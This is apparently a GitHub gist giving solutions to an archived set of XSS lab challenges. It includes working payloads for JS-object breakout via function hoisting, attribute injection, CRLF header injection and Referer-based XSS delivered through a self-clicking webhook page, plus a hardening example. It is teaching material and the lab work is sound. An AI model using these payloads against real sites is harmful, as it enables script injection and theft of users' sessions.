
@Sankalpa-Acharya
Last active January 15, 2024 14:11
Solution of XSS Challenges [Archive - 2015] By Mazin Ahmed

Breaking out of the JS object and adding an alert function will not work here because

parent.Arbiter.inform("data", {"id":"});

This JS code throws an error first, which then prevents our alert function from executing.

So what is the error?
Arbiter is undefined in the code, so accessing anything on it throws an error.

In JavaScript, Hoisting refers to the process whereby the interpreter appears to move the declaration of functions, variables or classes to the top of their scope, prior to execution of the code.
Using this concept we can solve this challenge.

// Payload
alert`xss`});function Arbiter(){};//  
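
The behaviour described above and one way to close it, as an added example that is not part of the original gist. It assumes the page concatenates the parameter unquoted into the `id` value of the inline script; `renderVulnerable`, `renderHardened` and `run` are hypothetical names, and the script is run as global code in Node.js to stand in for a top-level browser page.

```javascript
// Added example, not code from the gist. The template shape is an assumption.

// Vulnerable (assumed): the parameter is concatenated into the inline script as-is.
function renderVulnerable(id) {
  return 'parent.Arbiter.inform("data", {"id":' + id + '});';
}

// Hardened: emit the value as a JS string literal, then escape characters that
// could close the <script> element or be parsed as markup or line terminators.
function renderHardened(id) {
  const literal = JSON.stringify(String(id)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return 'parent.Arbiter.inform("data", {"id":' + literal + '});';
}

// Run a rendered script as global code (indirect eval) with `parent` pointing
// at the global object, as in a top-level page, and record what happened.
function run(script, withArbiter) {
  const seen = { alerts: 0, ids: [], error: null };
  const g = globalThis;
  g.parent = g;
  g.alert = () => { seen.alerts += 1; };
  // Stand-in for the real Arbiter object the page expects (assumed shape).
  if (withArbiter) g.Arbiter = { inform: (_topic, data) => seen.ids.push(data.id) };
  try {
    (0, eval)(script);
  } catch (e) {
    seen.error = e.name;
  } finally {
    delete g.parent; delete g.alert; delete g.Arbiter;
  }
  return seen;
}

// noDecl is constructed (the page's payload without the declaration);
// hoisted is the payload shown on the page.
const noDecl = 'alert`xss`});//';
const hoisted = 'alert`xss`});function Arbiter(){};//';

// Arbiter undefined: the property read throws before the argument is evaluated.
console.log(run(renderVulnerable(noDecl), false));
// Hoisted declaration: the read succeeds, so the argument is evaluated first.
console.log(run(renderVulnerable(hoisted), false));
// Escaped literal: the same input reaches inform() as an ordinary string.
console.log(run(renderHardened(hoisted), true));
```
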

Our input is reflected inside a hidden input tag.

// Payload
hello" autofocus onfocus=alert('xss') type="text 

Same as Challenge 1

// Payload
alert`xss`});function Arbiter(){};//  

This lab is a combination of CRLF injection and XSS.

Payload
%0AContent-Type%3A%20Sankalpa%0AHTTP%2F1.1%20200%20OK%0AContent-Type%3A%20texml%0A%3Cimg%20src%3Dx%20onerror%3Dalert(%27xss%27)%3E

// Payload
https://javascript%27%20autofocus%20onfocus='alert``

This lab is interesting 😉.
We can easily inject

<img src=x onerror=alert('xss')>

in the Referer header. But the main challenge is: how can we send the payload in the Referer header without adding it manually?

For this, our domain would have to be something like this:

https://<img src=x onerror=alert('xss')>.com

That is not possible, but we can definitely do this:

https://sankalpa.info.np/<img src=x onerror=alert('xss')>

I used this webhook.site site to exploit it.

  1. Create your webhook URL.
  2. Click on the edit icon at the top right-hand side.
  3. Change the content type to text/html.
  4. Paste the code below into the body section and save.

<a id="ss" href="https://secbot-xss-challenges.vercel.app/xss-challenge6.php" >click me</a>

<script>
document.getElementById('ss').click()
</script>

Your webhook URL should look like this: https://webhook.site/<UUID>/<img src=x onerror=alert('xss')>/

When you visit the webhook URL you will be redirected to https://secbot-xss-challenges.vercel.app/xss-challenge6.php with an alert pop up.

Thanks For Reading ❤️
